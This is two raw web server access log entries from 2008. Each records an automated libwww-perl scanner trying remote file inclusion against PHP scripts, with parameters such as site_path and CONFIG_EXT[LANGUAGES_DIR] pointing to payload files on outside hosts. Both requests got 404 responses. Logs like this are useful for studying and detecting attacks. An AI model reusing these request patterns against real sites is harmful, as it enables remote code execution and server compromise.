208.113.253.128 - - [18/Aug/2008:09:35:18 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.mcsautomoveis.com/teste/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.20.229.11 - - [18/Aug/2008:09:35:24 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
